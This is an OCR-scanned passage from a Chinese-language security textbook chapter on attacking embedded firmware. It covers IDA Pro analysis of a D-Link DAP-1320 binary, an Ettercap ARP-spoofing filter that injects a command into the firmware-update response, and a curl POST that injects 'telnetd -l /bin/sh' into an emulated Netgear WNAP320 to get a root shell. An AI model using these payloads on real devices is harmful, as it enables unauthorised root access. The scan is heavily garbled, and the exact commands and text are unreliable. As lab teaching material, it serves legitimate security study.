root@kali:~/DAP-1320/fmk/rootfs# strings bin/ssi | grep "$s" | grep 

"/dev/null" 

wget -P /tmp/ $s » /dev/null 

wget $s -O $s >/dev/null & 

AS ISA TEN. BO eee a DS aT 7283 [8 LEE, 8 — FeSO 
经 控制 了 变量 URL。 本 实验 选用 IDA Pro 工 具 。 

IDA Pro 分 析 的 主要 目的 是 确定 字符 串 的 使 用 方式 , 以 判断 是 合 给 攻击 者 留 下 了 
更 改 字符 串 的 机 会 。 在 IDA Pro 中 打开 ssi 二 进 制 文件 后 ， 确 保 将 处 理 器 设置 为 MIPS， 
然后 执行 以 下 步骤 : 

(1) 碍 找 感 兴趣 的 字符 串 。 

(2) 确定 如 何 使 用 字符 串 。 

(3) 确定 URL 的 来 源 ( 我 们 对 便 编 码 不 感 兴趣 )。 

按 下 AltrIT 组 合 键 打开 文件 搜索 屏幕 ， 然 后 选择 租 找 字符 串 的 所 有 出 现 次 数 
(Find all occurrences)， 如 图 24-2 上 所 示 。 


c» Text search (slow!) 


String [wget -P /tmp/ %s| 


[| Match case 

[|_| Regular expression 
L] Identifier 

| | Search Up 

Find all occurrences 


[24-2 ”选中 Find all occurrences 
可 以 看 到 ， 这 个 字符 串 只 出 现 了 两 次 : 一 次 是 静态 格式 化 字符 串 ， 另 一 次 是 对 


静态 字符 串 的 引用 ， 如 图 24-3 所 示 。 注 意 ， 可 忽略 函数 名 ， 初 始 分 析 时 ， 它 并 不 在 
那里 ， 它 是 由 作者 后 来 添加 的 。 
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Function Instruction 


download fw and lp E $al, aV/getPImpSDevNu # "wget -P /tmp/ %s > /... 


aWgetPTmpSDevNu:.ascii "wget -P /tmp/ %s > /dev/null"<0> 


图 24-3 ”相应 的 字符 串 只 出 现 了 两 次 


通过 双击 加 亮 显示 的 结果 ， 将 跳 转 到 反 汇 编 右 中 相应 指令 的 位 置 ， 回 下 滚动 ， 
可 看 到 在 sprintf 中 使 用 这 个 字符 串 构建 了 下 载 命 令 ， 并 在 00409064 处 传递 给 了 
system， 如 图 24-4 所 示 。 


: 00409010 $al, aWgetPTmpSDevNu # "wget -P /tmp/ %s > /dev/null" 
: 00409014 $t9 ; sprintf 

:60409018 $a0, $52 

:0040901C $gp, 9x2B@+var_2A0($sp) 
:00409028 $a0, $s0 

:00409024 gal, $zero 

: 00409028 $t9, memset 

: 00400902C 

: 00409030 $t9 ; memset 

: 00409034 $a2, 0x80 

:00409038 $gp, @x2B@+var_2A0($sp) 
:0040903C $a2, 8($s3) 

: 00409040 $a1, 0x43 

: 00409044 $t9, sprintf 

: 00409048 $al, aTmpS # "/tmp/%s" 
: 00409804C $t9 ; sprintf 

: 00409050 $a0, $s0 

:00409054 $gp, Ox2BO-«var 2Ae($sp) 
: 00409058 

:0040905C $t9, system 

: 00409060 

: 00409064 $t9 ; system 


图 24-4” 传 给 system 


这 时 我 们 至 少 明白 ， 这 个 字符 串 用 于 调用 system。 这 里 ， 我 们 需要 了 解 如 何 提 
供 格式 化 字符 串 中 的 URL。 为 此 ， 需 要 跟踪 程序 的 控制 流 。 

要 跟踪 进入 这 个 子 例 程 /函数 的 控制 流 ， 我 们 需要 深 动 到 函数 顶部 ， 并 选择 左 侧 
的 地 址 ， 如 图 24-5 所 示 。 选 择 地 址 后 ， 只 需要 按 下 X 键 即 可 进入 对 它 的 交叉 引用 。 


LOAD : | download fw and lp: # DATA XREF: LOAD:0044676410 
LOAD: | 

LOAD: | var. 2A6 [i xrefs to download fw and Ip 

LOAD: var 29f 

LOAD: | var 218 Direct 下 Address Text 

LOAD: E NEN D. o LOAD:00446764 .word download fw and lp 

LOAD: 

LOAD: | 

LOAD: | a 

LOAD: | var. 8 aise coe eee 


| var 4 |Line 1 of 1 


LOAD: 
LOAD: 80408F30 lui $gp, 0x45 
LOAD: 00408F34 addiu — $sp, -@x2Be 


图 24-5 选择 元 侧 的 地 址 
对 下 载 例 程 的 交叉 引用 实际 上 是 一 个 查找 表 ， 其 中 包含 指向 每 个 命令 入 口 的 函 


数 指针 。 该 代码 搜索 命令 ， 并 跳 转 到 相 邻 的 例 程 指针 处 。 你 将 看 到 “IPv6 Function" 


“Download FW and language to DUT” “get wan ip” 命 令 ， 如 图 24-6 所 示 。 
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: 00446754 : aIpv6 t ipv6 

: 00446758 : sub 40E798 

:0044675C i alpv6Function "IPv6 Function" 
: 00446760 , MULTIS RS t "download fw lp" 
: 00446764 


D: 00446768 .W aDown losdFwAndL "Download FW and language to DUT" 
AD:6044676C ; aGetWlanIp "get wlan ip" 

D:00446770 á sub A40D680 

D: 90446774 : aGetWlanlp e + "Get wlan ip" 


图 24-6 ”你 将 看 到 多 个 命令 


注意 ,这些 命令 采用 短 名 称 、 函 数 指针 和 长 名 称 的 形式 。 由 于 这 是 一 个 查找 表 ， 
我 们 需要 通过 这 个 得 找 表 的 开头 定位 对 它 的 交叉 引用 。 

尽管 我 们 对 系统 调用 的 追踪 没有 完全 追踪 到 底 ， 但 可 以 肯定 ， 它 指向 下 载 固 件 
dus download fw lp 字符 串 的 一 些 greps 四 显示 了 源 @@ 上 日 。 此 时 ， 我 们 将 继续 
尝试 通过 固件 更 新 方法 攻击 设备 。 


Oroot@kali:~/DAP-1320/fmk/rootfs# grep -r download fw lp . 
O./www/Firmware.htm:«input type="hidden" id-"action" name-"action" 
value-"download fw lp"» 

Binary file ./bin/ssi matches 

Oroot@kali:~/DAP-1320/fmk/rootfs# grep -C 7 download fw lp 
www/Firmware.htm 

<form id-"form3" name-"form3" method="POST" action-"apply.cgi"» 
«input type-"hidden" id-"html response page" 

name-"html response page" value-"Firmware.htm"» 

«input type-"hidden" name-"html response return page" 
value="Firmware.htm"> 

<input type="hidden" id="html response message" 

name-"html response message" value-"dl fw lp"» 

«input type-"hidden" podia cma name-"file link" value-""» 
«input type-"hidden" id-"file name" name-"file name" value-""» 
<input type="hidden" id-"update type" name-"update type" value=""> 
«input type-"hidden" id-"action" name-"action" 
value-"download fw lp"» 

</form> 


24.2 ”使 用 硬件 执行 动态 分 析 


上 面 完成 了 评 佑 的 静态 分 析 部 分 。 下 面 将 分 析 运 行 中 的 系统 。 我 们 需要 设置 一 
个 环境 ， ML 将 DAP-1320 连 接 到 测试 网 络 ， 并 开始 执 
行 固 件 更 新 过 程 。 最 终 目标 是 通过 命令 注入 针对 无 线 中 继 器 执行 一 些 操作 。 


24.2.1 设置 测试 环境 
我 们 使 用 64 位 的 Kali Linux 2017, Ettercap. 、 固 件 厂 本 为 1.11 的 DAP-1320 无 线 中 
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继 器 以 及 一 个 常备 的 无 线 网 络 进行 测试 ， 常 见 的 做 法 是 对 DAP-1320 实 施 ARP 欺 驴 ， 
从 而 使 得 所 有 进出 该 设备 的 流量 都 通过 Kali Linux 系 统 。 虽然 也 可 将 一 个 设备 部 署 在 
中 继 器 与 路 由 器 之 间 ， 对 流量 进行 检查 和 修改 后 转发 ， 但 ARP 坎 骗 是 网 路 环境 中 最 
适合 的 攻击 机 制 。 


24.2.2 Ettercap 


先 来 和 侧 单 复习 一 下 ，ARP(Address Resolution Protocol， 地 址 解析 协议 ) 是 一 种 将 
IP 地 址 解析 为 MAC(Media Access Control， 尹 体 访 问 控制 ) 地 址 的 机 制 。MAC 地 址 十 
网 络 设备 制造 商 分 配 的 唯一 地 址 。 简 单 来 讲 ， 当 一 个 工作 站 需要 与 另 一 个 工作 站 通 
信 时 ， 它 使 用 ARP 确 定 与 所 使 用 的 PP 关联 的 MAC 地 址 。ARP 欺 骗 有 效 地 在 工作 站 的 
ARP 表 中 投 毒 ， 导 致 它们 使 用 攻击 者 的 MAC 地 址 ， 而 不 是 目标 工作 站 的 实际 MAC 
地 址 。 因 此 ， 指 向 目 的 地 的 所 有 流量 都 流 癌 攻击 者 的 工作 站 。 这 样 ， 无 须 物 理 地 修 
改 网 络 ， 就 实际 性 插入 了 一 个 设备 。 

Hy {$ H Ettercap LH. SCARPE, 4T HIR] A (Man-In-The-Middle, MITM)JX 
击 ， 解 术 数 据 包 ， 修 改 数 据 包 ， 人 然后 将 数据 包 转 友 给 接收 者 。 首 先 ， 使 用 Ettercap， 
执行 以 下 命令 (这 里 , 设备 是 192.168.1.173 , 网 关 是 192.168.1.1), 看 一 下 设备 和 Internet 
之 间 的 流量 : 


root@kali:~/DAP-1320# ettercap -T -q -M arp:remote /192.168.1.173// 
/192.168.1.1// 


Ettercap 局 动 后 ， 使 用 Wireshark 答 看 与 设备 交互 时 的 流量 。 局 动 Wireshark 并 开 
始 捕 获 后 ， 在 设备 更 新 页 面 上 检查 固件 更 新 ， 如 图 24-7 所 示 。 


eJ linkap.bocal c [E wu ENTE AIRE 


D-Link Home | Settings | Management 


This page shows you your current firmware version, and allows you to check for and 
download new firmware. After downloading the firmware, you can then upgrade it by using 
the buttons below. 


Firmware Information 


Current Firmware Version: 1.11 


Current Firmware Date: 2013/59/16 


Check for New Firrmwane 
Upgrade Manually 
Upgrade Firmware Select File 


图 24-7 在 设备 更 新 页 面 上 检查 固件 更 新 
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早 击 Check for New Firmware 按 钮 , 并 在 Wireshark 中 跟踪 TCP 数 据 流 。 现 在 看 到 ， 
设备 进入 开始 两 行 中 显示 的 http://wrpd.dlink.com.tw/router/firmware/query.asp?7model= 
DAP-1320 Ax _Default， 啊 应 是 以 XML 格 式 编 码 的 数据 ， 如 图 24-8 所 示 。 


Stream Content 


GET /router/firmware/query.asp?model-DAP-1320 Ax Default HTTP/1.1 
Host: wrpd.dlink.com.tw 
Connection: Keep-Alive 


HTTP/1.1 200 OK 

Date: Fri, O3 Jan 2014 00:21:15 GMT 

Server: Microsoft-IIS/6.0 

X-Powered-By: ASP.NET 

Content-Length: 566 

Content-Type: text/xml; Charset-UTF-8 

Set-Cookie: ASPSESSIONIDSSTCSCSA-JIFNFAADNHJHPHINGMBBOJND; path=/ 
Cache-control: private 


<?xml version="1.0" encoding="UTF-8" standalone-"yes" ?> 


图 24-8 ”响应 是 以 XML 格式 编码 的 数据 


进入 捕获 的 URL， 可 以 看 到 ，XML 包含 FW 主 要 版 本 号 和 次 要 版 本 号 、 下 载 站 
所 以 及 发 布 说 明 ， 如 图 24-9 所 示 。 


¥<DAP-1320 Ax» 
T «Default» 
¥<FW Version» 
<Major>01</Major> 
<Minor>11</Minor> 
<Date>2013-09-17</Date> 
<Recommend /> 
«/FW Version- 
Yvx«Download Site» 
v «Global? 
Yvx«Firmware- 
http: //d9ghdod87cnnk.cloudfront.net/DAP-1320/Ax/Default/0111/DAP1320A2 FW111Bl0.bin 
</Firmware> 
v<Release Note» 
http://wrpd.dlink.com/router/firmware/GetReleaseNote.aspx?model-DAP-1320 Ax Default FW 0111 
«/Release Note» 
«/Global» 
«/Download Site» 
«/Default- 
</DAP-1320 Ax» 


图 24-9 ”XML 包含 的 信息 


掌握 了 这 些 信息 后 ， 可 设想 一 下 ， 如 果 将 次 要 版 本 号 改 为 12， 而 且 将 固件 链接 
指向 一 个 shell 命 令 ， 将 迫使 设备 尝试 更 新 ， 并 最 终 运行 命令 。 为 完成 该 任务 ， 我 们 
需要 创建 一 个 Ettercap 过 滤器 @( 这 项 工作 之 前 已 经 保存 ， 只 在 此 处 显示 )， 编 译 过 渡 
器 @ ， 然 后 运行 @ ， 如 下 所 示 : 


Oroot@kali:~/DAP-1320# cat ettercap.filter 
if (ip.proto == TCP && tcp.src == 80) { 
msg("Processing Minor Response...\n"); 
if (search(DATA.data, "<Minor>11")) { 
replace ("<Minor>11", "<Minor>12"); 


msg ("zapped Minor version!\n"); 
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if (ip.proto == TCP && tcp.src == 80) { 
msg("Processing Firmware Response...\n"); 
if (search(DATA.data, "http://d") ) 
{ 
replace ("http://d", "reboot" "); 


msg ("zapped firmware!\n"); 


} 

@root@kali:~/DAP-1320# etterfilter ettercap-reboot.filter -o 
ettercap-reboot.ef 

«output omitted for brevity> 

@root@kali:~/DAP-1320# ettercap -T -q -F ettercap-reboot.ef -M 
arp:remote /192.168.1.173// /192.168.1.1// 

«output omitted for brevity> 


为 确定 是 人 否 执 行 了 命令 , 需要 对 设备 执行 ping 操 作 , 然后 在 执行 更 新 时 监视 ping 
消息 。 但 首先 注意 ， 单 击 Check for New Firmware 按 钮 后 ， 可 以 看 到 ， 有 个 1.12 版 本 
可 供 下 载 ， 如 图 24-10 所 示 。 


| Settings | Management 


Upgrade 
This page shows you your current firmware version, and allows you to check for and 


download new firmware. After downloading the firmware, you can then upgrade it by using 
the buttons below. 


Firmware Information 


Current Firmware Version: 1.11 New Firmware Version: 1.12 


Current Firmware Date: 2013/29/16 New Firmware Date: 2013-12-18 
Upgrade Firmware 


Upgrade Manually 


Upgrade Firmware: 
图 24-10 有 个 1.12 版 本 可 供 下 载 


fe iti Upgrade Firmware 按钮 前 ， 需 要 设置 png 以 监视 设备 。 单 击 Upgrade 
Firmware 按 钮 时 ， 将 看 到 如 图 24-11 所 示 的 下 载 进度 框 。 
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Please do not close the browser 


while the firmware is being 
downloaded! 


图 24-11 下 载 进度 框 

root@kali:~/DAP-1320# ping 192.168.1.173 

64 bytes from 192.168.1.173: icmp seq-56 ttl-64 time-2.07 ms 
64 bytes from 192.168.1.173: icmp seq-57 ttl-64 time-2.20 ms 
64 bytes from 192.168.0.63: icmp seq-58 ttl-64 time-3.00 ms 
Qrrom 192.168.1.173 icmp seq-110 Destination Host Unreachable 


From 192.168.1.173 icmp seq-111 Destination Host Unreachable 
From 192.168.1.173 icmp seq-112 Destination Host Unreachable 
From 192.168.1.173 icmp seq-113 Destination Host Unreachable 
From 192.168.1.173 icmp seq-114 Destination Host Unreachable 
From 192.168.1.173 icmp seq-115 Destination Host Unreachable 
From 192.168.1.173 icmp seq-116 Destination Host Unreachable 
From 192.168.1.173 icmp seq-117 Destination Host Unreachable 
From 192.168.1.173 icmp seq-118 Destination Host Unreachable 
From 192.168.1.173 icmp seq-119 Destination Host Unreachable 
From 192.168.1.173 icmp seq-120 Destination Host Unreachable 
From 192.168.1.173 icmp seq-121 Destination Host Unreachable 


O64 bytes from 192.168.1.173: icmp seq-122 ttl-64 time-1262 ms 

64 bytes from 192.168.1.173: icmp seq-123 ttl-64 time-239 ms 

64 bytes from 192.168.1.173: icmp seq-124 ttl-64 time-2.00 ms 

你 将 注音 到 ， 设 备 失 去 啊 应 人 @ ， 后 来 重新 联机 @ 。 这 表明 设备 已 经 重新 局 动 。 
此 时 已 经 证 实 ， 我 们 可 以 将 命令 注入 更 新 的 URL 并 被 设备 执行 。 如 果 不 将 可 执行 文 
件 上 传 给 设备 ， 操 作 将 受 限 于 设备 上 已 有 的 程序 。 例 如 ， 如 前 所 述 ， 如 果 将 telnetd 
编译 到 busybox( 它 目前 不 在 这 个 系统 中 )， 那 么 只 需要 局 动 它 以 访问 不 需要 密码 的 
shell， 如 下 所 示 : 


telnetd -1 /bin/sh 


稍 后 将 演示 这 种 方法 。 如 有 必要 ， 正 如 Craig Heffner 所 演示 的 ， 可 对 netcat 等 二 
进 制 文件 进行 交叉 编译 ， 然 后 通过 tftp 或 ttep 上 传 ， 也 可 选择 其 他 方法 。 
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24.3 ”使 用 模拟 希 执 行动 态 分 析 


可 以 看 到 ， 东 些 情况 下 ,不必 使 用 手头 的 人 硬件， 也 可 执行 漏洞 分 析 并 攻击 固件 。 
24.3.1 FIRMADYNE 工 具 


FIRMADYNE 工 具 人 允许 使 用 QEMU 虚 拟 机 监控 程序 模拟 国 件 。 这 种 方法 的 腕 点 
在 于 不 必 购 买 硬 件 即 可 测试 固件 。 这 种 方法 十 分 强大 , 人 允许 并 行 地 执行 大 规模 测试 。 
Dominic Chen 下 载 和 测试 了 23 000 个 固件 样本 ， 并 能 成 功 地 运行 其 中 的 9 400 个 ( 约 占 
40%)。 在 下 面 的 实验 中 ， 将 设置 并 执行 FIRMADYNE。 


24.3.2 ”实验 24-3: 设置 FIRMADYNE 


为 执行 本 实验 中 的 步骤 ， 需 要 在 VMware 或 VirtualBox 中 运行 Ubuntu 16.04.3 服 务 
器 ， 使 用 NAT 网 络 设置 ， 只 安装 OpenSSH， 有 用户 名 为 frmadyne。 首 先 ， 遵 循 
FIRMADYNE GitHub 中 的 说 明 设置 FIRMADYNE 工 具 ( 可 参阅 本 章 的 “扩展 阅读 ”)。 


firmadyne@ubuntu:~$ sudo apt-get update 

«output skipped throughout this lab for brevity> 
firmadyne@ubuntu:~S sudo apt-get install busybox-static fakeroot git 
kpartx \ 

> netcat-openbsd nmap python-psycopg2 python3-psycopg2 snmp 
uml-utilities \ 

> util-linux vlan 

firmadyne@ubuntu:~$ git clone -recursive \ 

» https://github.com/firmadyne/firmadyne.git 

firmadyne@ubuntu:~S git clone 
https://github.com/devttys0/binwalk.git 

Cloning into 'binwalk'... 

remote: Counting objects: 7413, done. 

remote: Compressing objects: 100$ (22/22), done. 

remote: Total 7/413 (delta 6), reused 15 (delta 3), pack-reused 7387 
Receiving objects: 100$ (7413/7413), 43.68 MiB | 3.62 MiB/s, done. 
Resolving deltas: 100$ (4265/4265), done. 

Checking connectivity... done. 

firmadyneGubuntu:-$ cd binwalk/ 

firmadyne@ubuntu:~/binwalk$ sudo ./deps.sh 

«output skipped for brevity> 

Continue [y/N]? y 

«output skipped for brevity> 

firmadyne@ubuntu:~/binwalkS sudo python ./setup.py install 
firmadyne@ubuntu:~/binwalk$ sudo apt-get install python-lzma 
firmadyne@ubuntu:~/binwalkS sudo -H pip install \ 

> git-*https://github.com/ahupp/python-magic 


firmadyne@ubuntu:~/binwalk$ sudo -H pip install \ 
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> git*https://github.com/sviehb/jefferson 
firmadyneQubuntu:-/firmadyne$ git clone 
https://github.com/firmadyne/sasquatch.git 
firmadyne@ubuntu:~/firmadyneS cd sasquatch/; make; sudo make install 


接 下 来 安装 PostgreSQL 数 据 库 : 
firmadyne@ubuntu:~$ sudo apt-get install postgresql 
此 后 ， 在 看 到 提示 消息 后 ， 将 用 户 firmadyne 的 密码 设置 为 firmadyne: 


firmadyne@ubuntu:~S sudo -u postgres createuser -P firmadyne 
Enter password for new role: 
Enter it again: 


接着 ， 创 建 数据 库 并 进行 初始 化 。 注 意 ， 在 下 一 条 命令 的 末尾 附加 了 frmware: 


firmadyneQGubuntu:-^$ sudo -u postgres createdb -O firmadyne firmware 
firmadyne@ubuntu:~$S sudo -u postgres psql -d firmware < \ 

> ./firmadyne/database/schema 

CREATE TABLE 

ALTER TABLE 

CREATE SEQUENCE 

ALTER TABLE 

«output skipped for brevity> 


下 载 FIRMADYNE 的 预 编 译 二 进 制 文件 (也 可 遵循 FIRMADYNE GitHub 上 的 说 


明 构 建 二 进 制 文件 ): 


firmadyne@ubuntu:~$ cd ~ 

firmadyne@ubuntu:~$ cd ./firmadyne; ./download.sh 

Downloading binaries... 

Downloading kernel 2.6.32 (MIPS)... 

--2017-11-26 20:15:27-- https://github.com/firmadyne/kernel- 
v2.6.32/releases/download/v1.0/vmlinux.mipsel 

Resolving github.com (github.com)... 192.30.253.113, 192.30.253.112, 
192 .30.253.113 

Connecting to github.com (github.com) |192.30.253.113|:443... connected. 
«output skipped for brevity> 


现在 安装 QEMU: 


firmdyne@ubuntu:~/firmadynes$ sudo apt-get install qemu-system-arm \ 
> qemu-system-mips qemu-system-x86 qemu-utils 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

The following additional packages will be installed: 

«output skipped for brevity> 

Do you want to continue? [Y/n] y 
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«output skipped for brevity> 


最 后 ， 将 firmadyne.config 文 件 中 的 FIRMWARE DIR 变 量 设置 为 frmadyne 文 件 
所 在 位 置 : 


firmadyne@ubuntu:~/firmadynes sed -i \ 

> 's#/vagrant/firmadyne#/firmadyne/firmadyne#' firmadyne.config 
firmadyne@ubuntu:~/firmadyneS sed -i 

's/#FIRMWARE DIR/FIRMWARE DIR/' \ 

» firmadyne.config 

firmadyneQGubuntu:-/firmadyne$ head firmadyne.config 

#!/bin/sh 


# Uncomment and specify full path to FIRMADYNE repository 
FIRMWARE, DIR=/home/firmadyne/firmadyne/ 

# specify full paths to other directories 

BINARY DIR=${FIRMWARE DIR}/binaries/ 

TARBALL DIR=${FIRMWARE DIR}/images/ 

SCRATCH DIR=${FIRMWARE DIR}/scratch/ 

SCRIPT DIR=${FIRMWARE DIR}/scripts/ 

<truncated for brevity> 


24.3.3 ”实验 24-4: 模拟 固件 


设置 环境 后 ， 可 以 模拟 一 个 示例 固件 (与 上 面 一 样 ，FIRMADYNE GitHub 上 给 
出 了 说 明 )。 
首先 使 用 extractor 脚 本 提取 固件 : 


firmadyne@ubuntu:~/firmadynesS wget -r \ 
http://www.downloads.netgear.com/files/GDC/WNAP320 
/WNAP320$20Firmware$20Version$202.0.3.zip 
firmadyneGubuntu:-/firmadyne$ ./sources/extractor/extractor.py -b 
Netgear \ 

> -sql 127.0.0.1 -np -nk "WNAP320 Firmware Version 2.0.3.zip" images 
>> Database Image ID: 1 


/home/firmadyne/firmadyne/WNAP320 Firmware Version 2.0.3.zip 
>> MDS: 5leddc/046d//a/52ca4Ab39fbda50afft 

>> Tag: 1 

>> Temp: /tmp/tmpUVsRC8 

<output skipped for brevity> 

>> Skipping: completed! 

>> Cleaning up /tmp/tmpUVSRC8... 


现在 ， 使 用 getArch 脚 本 获取 体系 结构 ， 并 将 其 存储 在 数据 库 中 (在 看 到 提示 消 
ET, 输入 firmadyne DB 密码 firmadyne): 


firmadyne@ubuntu:~/firmadynes$ ./scripts/getArch.sh ./images/l.tar.gz 
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./bin/busybox: mipseb 
Password for user firmadyne: 


现在 ， 将 已 提取 文件 系统 的 位 置 存储 在 数据 库 中 : 


firmadyne@ubuntu:~/firmadynes ./scripts/tar2db.py -i 1 
-f ./images/l.tar.gz 


接 下 来 使 用 makeImage 脚 本 创建 一 个 虚拟 镜像 ， 使 用 QEMU 忆 动 该 镜像 : 
firmadyneQubuntu:-/firmadyne$ sudo ./scripts/makelmage.sh 1 
Be PORRO ZR OR ag te 21S IT OOF), TS SERT): 


firmadyne@ubuntu:~/firmadynes ./scripts/inferNetwork.sh 1 
Querying database for architecture... Password for user firmadyne: 
mipseb 

Running firmware 1: terminating after 60 secs... 

main-loop: WARNING: I/O thread spun for 1000 iterations 
qemu-system-mips: terminating on signal 2 from pid 23713 
Inferring network... 

Interfaces: [('brtrunk', '192.168.0.100')] 

Done! 


知道 IP 地 址 后 ， 运 行 模拟 器 : 


firmadyne@ubuntu:~/firmadynes ./scratch/l/run.sh 
Creating TAP device tapl 0... 

Set 'tapl 0' persistent and owned by uid 1000 
Bringing up TAP device... 

Adding route to 192.168.0.100... 

Starting firmware emulation... use Ctrl-a 十 x to exit 
«output skipped for brevity> 


如 果 在 执行 时 ， 将 上 述 命令 搞 乱 了 ， 可 随时 重 置 数据 库 和 环境 。 为 此 ， 只 需要 
运行 以 下 命令 : 


firmadyneQubuntu:-/firmadyne$ psql -d postgres -U firmadyne -h 
7.0.0.4. X 

> -q -c 'DROP DATABASE "firmware"' 

Password for user firmadyne: 
firmadyneQGubuntu:-/firmadyne$ sudo -u postgres createdb -O firmadyne 
firmware 

firmadyne@ubuntu:~/firmadyne$ sudo -u postgres psql -d firmware \ 
> < ./database/schema 

firmadyne@ubuntu:~/firmadyneS sudo rm -rf ./images/*.tar.gz 
firmadyne@ubuntu:~/firmadyne$ sudo rm -rf scratch/ 


此 时 , 固件 应 当 作 为 虚拟 网 络 设备 以 上 述 下 地 址 运行 。 此 外 , 还 能 从 运行 QEMU 
的 机 天 连接 到 这 个 虚拟 接口 。 最 理想 的 情况 是 : 机 如 上 运行 的 是 果 面 环境 (GUD。 但 
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在 这 里 ， 在 虚拟 机 上 运行 的 是 QEMU 而 不 是 果 面 环境 。 为 了 从 男 一 台 主 机 与 接口 交 
互 ， 我 们 需要 采用 一 种 有 创意 的 做 法 。 


机 。 通 过 这 种 方式 ， 我 们 可 以 访问 远程 虚拟 网 络 讽 备 ， 就 像 在 虚拟 设备 上 执行 本 地 
操作 一 样 。 由 于 sshuttle 在 Python 上 运行 ,因此 可 用 于 Linux、macOS 和 Windows 环 境 。 
首先 使 用 pip 安 装 sshuttle: 
$sudo pip install sshuttle 
启动 它 : 


Ssshuttle --dns -r username@IP ADDR OF REMOTE SVR -N 


下 面 是 Mac 中 的 示例 : 


MacBook-Pro:$ sshuttle --dns -r firmadyne8192.168.80.141 -N 

firmadyne8192.168.80.141's password: 

lient: Connected. 

此 时 ， 在 运行 sshuttle 的 系统 上 打开 Web 浏 览 右 ， 莹 试 连接 到 相应 的 卫 地 址 ， 如 
图 24-12 所 示 。 在 模拟 器 中 启动 固件 后 ，Web 服 务 需 要 几 分钟 的 时 间 才 能 完全 启动 。 


[] Netgear x Guest 
ad C |© Not Secure | 192.168.0.100 Oo 
NETGEAR WNAP320 
Connect wil Innovation Pra 


Login Help 


图 24-12 TTJF Webii biz 


Hi xeadmin/password, A] MM) E3X $1]. RE, dE DSL E BT ERE FH a8 
如 图 24-13 所 示 。 
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SO 8 /B Netgear x ek, Guest | 
£ C | © 192.168.0.100/index.php o 
NETGEAR WNAP320 f 

Connec wilh nnovalian " ProSafe 
Wireless M Access Point 天 


Configuration Monitoring Maintenance 


IP : Wireless | Security | Wireless Bridge 


" Basic General 
* General 
= Time 


> Advanced Access Point Name [netgear123456 


Country / Region [ United States 3l 


General 


CANCE! APPLY 


图 24-13 ”登录 到 模拟 的 路 由 器 


如 果 Web 浏 览 器 挂 起 ， 则 检查 sshuttle 应 用 程序 。 该 应 用 程序 可 能 已 经 骨 溃 ， 需 


24.3.4 实验 24-5: 攻击 固件 


我 们 在 QEMU 中 已 经 模拟 了 Netegear WNAP320 固 件 。 现 在 开始 攻击 固件 。 
Dominic Chen 及 其 团队 在 运行 FIRMADYNE 后 , 在 这 个 固件 中 发 现 了 命令 注入 漏洞 。 
下 面 测试 一 下 能 人 否 发 起 攻击 : 


firmadyne@ubuntu:~$ nmap 192.168.0.100 


Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-10 21:54 EST 
Nmap scan report for 192.168.0.100 

Host is up (0.0055s latency). 

Not shown: 997 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

80/tcp open http 

443/tcp open https 


Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds 


Qfirmadyne8&ubuntu:-/firmadyne$ curl -L --max-redir 0 -m 5 -s -f -X 
POST ^ 

> -d "macAddress-000000000000;telnetd -1 
/bin/sh;&reginfo-1l&writeData-Submit" 
http://192.168.0.100/boardDataWW.php 


<html> 
<head> 
<title>Netgear</title> 
<style> 
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«truncated for brevity> 
firmadyneGubuntu:-/firmadyne$ nmap 192.168.0.100 


Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-10 22:00 EST 
Nmap scan report for 192.1698.0.100 

Host is up (0.0022s latency). 

Not shown: 996 closed ports 

PORT SIATE SERVICE 

22/tcp open ssh 

023/tcp open telnet 

80/tcp open http 

443/tcp open https 


Nmap done: 1 IP address (1 host up) scanned in 2.39 seconds 
firmadyneGubuntu:-/firmadyne$ telnet 192.168.0.100 

Trying 192.168.0.100... 

Connected to 192.168.0.100. 

Escape character is '^]'. 

/home/www # ls 

BackupConfig.php boardDataWW.php checkSession.php data.php 
header.php index.php login header.php packetCapture.php 
saveTable.php test.php tmpl 

«truncated for brevity> 

/home/www # id 

@uid=0 (root) gid=0 (root) 

/home/www # 


从 上 面 的 输出 可 以 看 到 ， 我 们 已 经 注入 了 Telnet 服 务 器 启动 命令 @ . “telnet -1 
/bin/sh" BAER Jm O E Telneti kór JF IC SD E $l/bin/shshell; nmapt4ti 
显示 应 口 23 已 经 打 开 人 名 . E Telneti kón, VCORE EIA root. RA 
这 是 在 模拟 的 固件 上 完成 的 ， 但 相同 操作 也 可 以 在 实际 固件 上 完成 。 此 时 ， 攻 击 者 
获得 了 设备 的 根 访问 权限 ， 可 以 该 设备 为 起 点 ， 在 网 络 上 友 起 其 他 攻击 。 


244 RB 
KEMASA, Yeon SO il A. ee NAS 
式 演 示 了 命令 注入 攻击 。 在 使 用 模拟 方式 时 ， 甚 至 不 必 购 买 便 件 设备 ， 即 可 发 现 漏 


洞 ， 并 进行 概念 验证 攻击 。 使 用 这 些 技 术 ， 道 德 黑 客 将 在 散 入 式 设备 上 友 现 安全 漏 
词 ， 并 以 符合 道德 的 方式 公开 漏洞 ， 丛 而 更 好 地 保护 大 众 的 安全 。 
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如 第 22 章 所 述 ， 物 联网 (Internet of Things，IoT) 设 备 预计 在 2020 年 超过 200 亿 台 。 
这 些 设备 将 进入 家 庭 、 办 公 室 和 医院 等 场所 。 无 论 我 们 是 在 跑步 、 洗 澡 、 开 车 、 看 
电视 还 是 睡觉 ， 这 些 设备 都 将 与 我 们 相伴 。 遗 憾 的 是 ， 此 类 设备 的 爆炸 性 增长 也 给 
攻击 者 提供 了 更 多 盗 取 我 们 信息 的 手段 。 最 恐怖 的 是 ， 攻 击 者 甚至 可 利用 这 些 设备 
给 社会 造成 有 形 的 损害 ， 如 侵入 心脏 起 搏 嚣 引发 心脏 病 ， 远 程控 制 汽车 使 其 加 速 直 
至 撞车 ， 动 持 飞 机 或 船上 只， 通过 输液 和 泵 输入 过 量 药物 ， 等 等 。 

本 章 将 讲述 如 何 防范 针对 物 联网 设备 的 恶意 软件 ， 介 绍 一 些 工 具 和 技术 ， 齐 析 
在 ARM 或 MIPS 架 构 上 运行 的 恶意 软件 ， 帮 助 组 织 检 测 、 阻 止 并 且 和 希望 可 以 防范 此 
类 攻击 。 


本 章 涵盖 的 主题 如 下 : 

e. 对 物 联 网 设备 的 物理 访问 

o 建立 威胁 实验 室 

© 动态 分 析 物 联网 恶意 软件 

e 对 ARM 和 MIPS 恶 意 软件 进行 逆向 工程 


25.1 对 物 联 网 设备 的 物理 访问 


